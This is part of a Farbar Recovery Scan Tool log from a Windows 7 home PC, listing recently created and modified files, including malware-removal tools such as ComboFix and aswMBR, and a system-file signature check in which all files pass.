2014-11-03 15:11 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 15:09 - 2014-11-03 15:20 - 00000000 ____D () C:\Qoobox
2014-11-03 15:09 - 2014-11-03 15:19 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 15:08 - 2014-11-03 15:08 - 05591672 ____R (Swearware) C:\Users\Ryan\Desktop\ComboFix.exe
2014-11-02 22:52 - 2014-11-02 22:52 - 00002392 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-11-02 22:52 - 2014-11-02 22:52 - 00000512 _____ () C:\Users\Ryan\Desktop\MBR.dat
2014-11-02 22:25 - 2014-11-02 22:26 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-11-02 22:23 - 2014-11-07 17:46 - 00014112 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:23 - 2014-11-02 22:24 - 00026866 _____ () C:\Users\Ryan\Desktop\Addition.txt
2014-11-02 22:18 - 2014-11-07 17:46 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 17:43 - 2012-06-09 02:40 - 01546012 _____ () C:\Windows\WindowsUpdate.log
2014-11-07 17:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-07 15:53 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:11 - 2012-05-04 13:49 - 00073946 _____ () C:\Windows\setupact.log
2014-11-06 16:11 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 17:45 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 15:31 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-03 21:28 - 2012-11-08 14:14 - 00000000 ____D () C:\Users\Ryan\.gimp-2.8
2014-11-03 18:23 - 2012-05-18 18:17 - 00264590 _____ () C:\Windows\PFRO.log
2014-11-03 15:18 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan
2014-11-03 15:18 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-11-05 19:02
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
